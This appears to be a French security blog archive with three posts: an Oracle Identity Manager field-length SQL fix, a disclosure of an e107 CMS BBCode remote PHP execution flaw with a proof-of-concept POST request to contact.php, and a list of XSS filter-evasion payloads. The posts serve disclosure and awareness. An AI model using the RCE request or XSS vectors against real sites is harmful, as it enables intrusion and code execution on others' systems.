Archive for the ‘Sécurité informatique’ Category

Oracle identity management : Problème de tailles des fields …

dimanche, mai 1st, 2011

Bonjour,

Lors de l’import du workflow ( Par définition un workflow est un fichier xml qui décrit le comportement ainsi les étapes à suivre suite à un provisionning direct dans le système target : Utilisation des connecteurs interfacés , modification des données concernant ces ressources ou même suppression .

Exemple :
1 – Ajout des données
2- Envoi un mail vers l’utilisateur
3- Envoi d’un mail à l’administateur
….

Donc , donc , donc lors de l’import à plusieurs reprises de fichier XML qui comporte la description du workflow ainsi la description des données de formulaire, on pour avoir un problème de taille des fields qui sera traduit en HTML : maxlength=0 et donc l’utilisateur ne peut plus saisir ces données …

La solution est simple : Allez dans la table SDC cherchez SDC_NAME qui égal au nom de votre champs et mettez le SDC_LENGTH = null pour le champs en question .

Update SDC SET SDC_LENGTH= ‘null’ WHERE SDC_NAME LIKE ‘%NOM_CHAMP%’

MERCI OIM ^^.

e107 BBCode Remote PHP Code Execution Vulnerability

mercredi, juin 23rd, 2010

Bonjour,

Hé oui tout est dans le titre de l’article !!

C’est une faille qui permet aux users non-athentifiés à exécuter du PHP à cause d’une mauvaise implémentation d’accés au niveau du contrôle du BBcode dans le CMS E107 :/ .

Cela est visible ici dans cette fonction du BBcodeParser:

function post_toHTML($text, $modifier = true, $extra = '') {
...

//If user is not allowed to use [php] change to entities
if(!check_class($pref['php_bbcode']))
{
$text = preg_replace("#\[(php)#i", "[\\1", $text);
}

return ($modifier ? $this->toHTML($text, true, $extra) : $text);
}

Or on voit bien qu’un post d’un user peut être transformer en HTML grâce à la fonction toHTML() function !!!

On va prendre un simple exemple : une fonction toEMAIL() :


function toEmail($text,$posted="",$mods="parse_sc, no_make_clickable")
{
if ($posted === TRUE && MAGIC_QUOTES_GPC)
{
$text = stripslashes($text);
}

$text = (strtolower($mods) != "rawtext") ? $this->replaceConstants($text,"full") : $text;
$text = $this->toHTML($text,TRUE,$mods);
return $text;
}

Alors si on utilise cette fonction pour le traitement des inputs de l’user, donc on peut exec du code php sans pbs *_* » !!!!

exemple :

if(isset($_POST['send-contactus'])){

$error = "";

$sender_name = $tp->toEmail($_POST['author_name'],TRUE,"rawtext");
$sender = check_email($_POST['email_send']);
$subject = $tp->toEmail($_POST['subject'],TRUE,"rawtext");
$body = $tp->toEmail($_POST['body'],TRUE,"rawtext");

Proof Of Concept ^^ :

Soit le POST Suivant à travers le code déjà implémenter :


POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]&

Donc à vos Patchs :)

XSS Paper :# !!

mardi, juin 15th, 2010

Bonjour,
Je vais vous présenter une attaque que je trouve si dangereuse et si répandue , il s’agit de XSS attaque .

Pour la déf , hé bin désolé de vous dire que vous pouvez googler le mot sinon voici quelques exemples des codes que je trouve sympa et intéressant de le savoir :

– Image XSS en utilisant un peu du JavaScript :

<IMG SRC= »javascript:alert(‘XSS’); »>

sinon

<IMG SRC=javascript:alert(‘XSS’)>

encore

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

aussi

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

celle aussi j’adore ^^

<IMG «  » »><SCRIPT>alert(« XSS »)</SCRIPT> »>

– XSS en double ou simple cotes :

<SCRIPT>alert(/XSS/.source)</SCRIPT>

sinon

\ »;alert(‘XSS’);//

– Cella c’est in ze End Title Tag :

</TITLE><SCRIPT>alert(« XSS »);</SCRIPT>

– Avec un joli petit input :p :

<INPUT TYPE= »IMAGE » SRC= »javascript:alert(‘XSS’); »>

Aussi mes chers je peux vous dire qu’à travers l’appel du CSS Sheet on pourra exec du code JS tq :

<LINK REL= »stylesheet » HREF= »javascript:alert(‘XSS’); »>

ou plutot avec un remote style Sheet :

<LINK REL= »stylesheet » HREF= »http://xssxsxsxsxsxsx/xss.css »>

Woila woilou , donc faut jamais hésiter à inspecter son code pour éviter le pire ~_~)*